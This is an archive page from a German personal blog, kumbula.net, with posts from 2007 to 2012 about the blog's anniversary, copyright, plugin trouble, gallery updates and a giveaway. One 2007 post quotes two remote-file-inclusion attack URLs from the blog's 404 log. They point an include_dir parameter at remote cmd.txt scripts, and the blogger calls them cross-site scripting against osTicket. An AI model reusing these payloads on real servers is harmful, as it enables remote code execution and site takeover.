Archive for the 'kumbula.network' Category

6 Jahre kumbula.net

Mittwoch, August 15th, 2012

Junge Junge Junge, ich habe gerade mal so durch den Blog gewühlt und festgestellt, dass kumbula.net mittlerweile ziemlich genau 6 Jahre auf dem Buckel hat. Das macht mich einerseits schon ein wenig stolz, andererseits führt mir das beim Durchstöbern auch wieder vor Augen, wie oft ich zu Themen gern schreiben würde, dies aber nicht vollbringe. Meistens mangelt es an der Motivation längere Texte zu tippen. Ein Phänomen von „Nicht-Hobby-Autoren“ (oder „Nicht-Berufs-Autoren“) im Web 2.0: Neuigkeitenaustausch mit 160 Zeichen per SMS, 140 per Twitter oder Status-Updates bei Facebook wo man es sowieso tunlichst vermeiden sollte, mehr als 2 zusammenhängende Sätze zu schreiben, da das die Aufmerksamkeitsspanne des durchschnittlichen Internetnutzers heutzutage in der Regel überfordert. Am besten sowieso nur ein Retro-Filter-Instagram-Pic geposted (die Dinger sehen aber auch schnicke aus…) und dazu ein Herz gemalt oder sich in 4 Worten über den Montag ausgekotzt. Erfahrungsgemäß bringt das mehr Anteilnahme und Aufmerksamkeit als der Rest. Aber egal, ich wollte mich ja hier nicht über FB auslassen, das habe ich 1 Post unter mir bereits getan (Von Dingen die nichts kosten: Die Akte Sofa).
6 Jahre kumbula.net in dieser Form also. Wahnsinn. Das ist länger als ich bisher jemals ein Auto gefahren habe (die gehen immer kaputt, woran aber die anderen Schuld sind). Nun ja, auf jeden Fall denke ich bei 6 Jahren Blog daran, dass ich der Seite in dieser Zeit nie ein neues Gesicht verpasst habe. Ich habe zwar damit probiert, es aber nie implementiert. Ebenso coole neue Features wie Tag-Clouds und andere schicke Plugins. Keine Liebe für die Seite. Das Kuriose dabei ist aber, dass trotz der fehlenden Liebe (was ich durchaus bereue, wie man das gern so oft hinterher tut…), also dass trotz der fehlenden Liebe für die Seite und trotz der Tatsache, dass es hier um wilde unterschiedliche Themen geht und trotz der Tatsache, dass die Postingfrequenz im Laufe der Jahre kontinuierlich (Kontinuität ist heutzutage bereits viel wert!) abgenommen hat, trotz all dieser schlimmen Umstände, sieht die Seite immer noch schick aus (besser als nach wie vor weite Teile des Internets), ist immer noch funktional und übersichtlich und nach wie vor schlicht aber dennoch strukturiert. Der Wahnsinn.
Zwischendurch habe ich übrigens durchaus mit anderen Dingen experimentiert, andere Domains, Systeme, Designs. Aber meistens scheitert dies wie gesagt am Elan. An der Lust mir die Zeit zu nehmen und den Drive zu finden wie gerade eben zum Beispiel annähernd 400 Worte zu tippen.
Mal schauen wo es mich mit kumbula und was weiß ich nicht noch so hin treibt. Ich habe bereits einen weiteren Artikel über ein paar Bunker vorbereitet. Aber das ist ein anderes Thema.

Internet, ich hab dich lieb. Das hier ist mein Teil.

Willkommen.

Urheberrecht / Vervielfältigung – EXPLIZIT

Sonntag, Juni 21st, 2009

Damit es vielleicht doch der ein oder andere Besucher liest, an dieser Stelle ein paar Worte zum Urheberrecht und dem Klauen vom geistigen Eigentum anderer Leute.
Diese Zeilen habe ich eben unter About hinzugefügt:

Noch ein Wort zu den Inhalten des Blogs. Im Impressum liest es sich:

Copyright:
Nachdrucke und Vervielfältigungen, gleich welcher Art, sind – auch Auszugsweise – nur mit schriftlicher Genehmigung des oben genannten Herausgebers gestattet.

Das ist kein Ulk oder billig kopierte Standardphrasen. Vermehrt schreibe ich in letzter Zeit Leute im Netz an, die Artikel und Howtos von mir einfach kopieren und auf ihren Internetseiten online stellen. Ich habe eigentlich wenig Lust, jedem eine Predigt über Urheberrecht und Anstand zu halten. Wenn ihr meint, meine geistigen Ergüsse weiter verbreiten zu wollen, setzt bitte einen Link auf den entsprechenden Eintrag in meinem Blog. Darüber freue ich mich.
Wer Texte nur kopiert und auf der eigenen Seite online stellt, macht sich im ersten Sinne strafbar (ich habe bisher niemanden abgemahnt) und darüber hinaus – und das zählt für mich an der Stelle mehr – müllt er das Internet mit doppelten und kopierten Informationen zu. Bereichert das Netz durch eigene Inhalte, oder setzt Links. Davon lebt das Netz, nicht vom kopieren!

20.000 Besucher im Blog

Sonntag, April 13th, 2008

Das ist mir doch mal einen Post wert zum Sonntag.
Heute morgen kam laut Blogcounter der 20.000ste Besucher. Da gratuliere ich mir doch selber. Gratz!
Ansonsten bin ich krank und hab viel auf der Todo-Liste was – wie zu oft – liegen bleibt.

Der Blog ist ein Schlachtfeld UPDATE

Montag, März 24th, 2008

Hier sieht es immer noch aus wie Kacke, Tags gehen nicht, wilde Kategorien sind rumgewürfelt, es gibt Doppelten Content mit den anderen Blogs. Gna. Ich werde mich wohl morgen Abend mit ’nem Bier hinsetzen und das mal richten. Mistkackeaisr7u34wopfguwef(%&/$“)…

Update:

Zum Ostermontag nutze ich die Gunst der Stunde und hab mal etwas aufgeräumt.
Hoffe ich komme bald dazu ein paar Plugins, vor allem das Tagging wieder zu aktivieren.

Und meine Festplatte wollte ich auch mal aufräumen…herrje – ich geh jetzt erstmal lecker Rumspteak essen. *mjam*

Import Export von WordPress

Dienstag, März 4th, 2008

Toll, da wollte ich die Inhalte aus mehreren Blogs zusammenziehen da meine Beitragsfrequenz so niedrig geworden ist, dass das schlichtweg keinen Sinn mehr macht, und was passiert: WordPress importiert die Beiträge natürlich ohne Überschrift und das scheiss Tagging-Plugin geht immer noch nicht. Gna.
Hab eh zu wenig Zeit im Moment, vielleicht mal nächste Woche, sorry für den Wust im Blog.

Verfluchets Tag-Plugin

Dienstag, Januar 8th, 2008

Schöner fand ich es schon mit dem Plugin und den tollen Tags rechts da. Aber kaputt isses dennoch. DItt nervt mir gerade an, ey boah ey….
Wat tu ick nur…watt tu ick nur…
Morgen wieder vielleicht dann….

Ach du dickes Ei – Websaftsack am Start – Update

Mittwoch, Juli 18th, 2007

Ei ei ei, was haben wir denn hier im 404-Log:

http://kumbula.net/category/include/main.php?config
[search_disp]=true&include_dir=http://br.geocities.com/edmidg/cmd.txt?

War wieder der High-Level-Scripting-L33t-Haxx0r-Bot am Start?

Leck mich!

Update:
Da hat sich wohl jemand ’ne neue Domain besorgt nachdem die bei Geocities gesperrt wurde. *flöt* 😀

404: http://kumbula.net/include/main.php?config
[search_disp]=true&include_dir=http://edl.yoll.net/cmd.txt?

Der Clou an der Sache ist, dass das ein Cross-Site-Scripting-Angriff auf osTicket ist, ein ganz nettes Ticketsystem, was aber schon lange nicht mehr hier läuft. Gut für mich, doof für den schlimmen Finger.

Update der Bildergalerien

Sonntag, Juli 15th, 2007

Nach langer Zeit mit einer total einfachen Galerie (SimplePhotos 0.4 Beta), hab ich heute ein Mega-Update gefahren (neben vielen anderen Verbesserungen).

Die alte Galerie zeichnete sich dadurch aus, dass man einfach nur die Dateien per FTP überträgt und fertig. Leider hatte sie den elemntaren Nachteil, dass man unter den Bildern nicht navigieren kann (vor, zurück, nächstes Bild…).

Deswegen gibt es jetzt in der kumbula-Pic-Base die Version 2 auf Basis von phpwebgallery. Relativ einfach, aber doch noch etwas gewöhnungsbedürftig.

Klick für die neue Galerie

Enjoy it! 😉

nulluhrfünfundvierzig

Sonntag, Juli 15th, 2007

So sieht es aus:

Ich hab heute etwas am Background der Seite gepimpt und ein paar nützliche Plugins installiert, hauptsächlich was Meta-Tags (also Suchmaschiennenoptimierung) angeht sowie Unterstützung für Leute die über Suchmaschinen kommen.
Außerdem hab ich ein zweites Projekt aufgesetzt was um das Thema Fallschirmhüppen gehen soll, aber das macht noch Probleme – warum auch immer. Alles eher technisch. Ich mach jetzt Freizeit.

Gewinnspielnutten aufgepasst!!! *Update*

Dienstag, Mai 29th, 2007

Willkommen zum Minigewinnspiel zum Dienstag. 😀

Der Onkel verlost ein wenig Kram:

  • 2 x NOD32-Carepaket mit Merchandise
  • 2 x Revoltec SATA Kabel 100cm, blau, UV-aktiv

Teilnehmen kann jeder mit einer gültigen Emailadresse.
Einfach einen sinnvollen Kommentar da:
Mein neuer Rechner
oder da
R.I.P. Klaus – Eine Ära geht zu Ende
schreiben.
Bereits abgegebene Kommentare zählen nicht. 😉

Auswertung erfolgt nach Pfingsten, bis dahin ist also noch Zeit zum mitmachen.
Das Mitmachweb…HA HA HA….

Update:
Die glücklichen Gewinner sind:

  • je ein „NOD32-Carepaket mit Merchandise“ erhalten: Astydon & rags
  • je ein „Revoltec SATA Kabel 100cm, blau, UV-aktiv“ erhalten: wednesday & Hades
  • einen Sonderpreis (überlege ich mir noch, wahrscheinlich eine Wurst) für den schönsten Beitrag erhält: Falk
  • die Teilnahmebedingen (eine gültige Emailadresse hinterlassen, die übrigens nur ich lesen kann) konnte otti leider nicht erfüllen und geht somit völlig leer aus

Danke für eure Teilnahme. 🙂

Bitte schickt mir einmal eure Adressen, Eure Gewinne kommen dann die Tage mit der Post.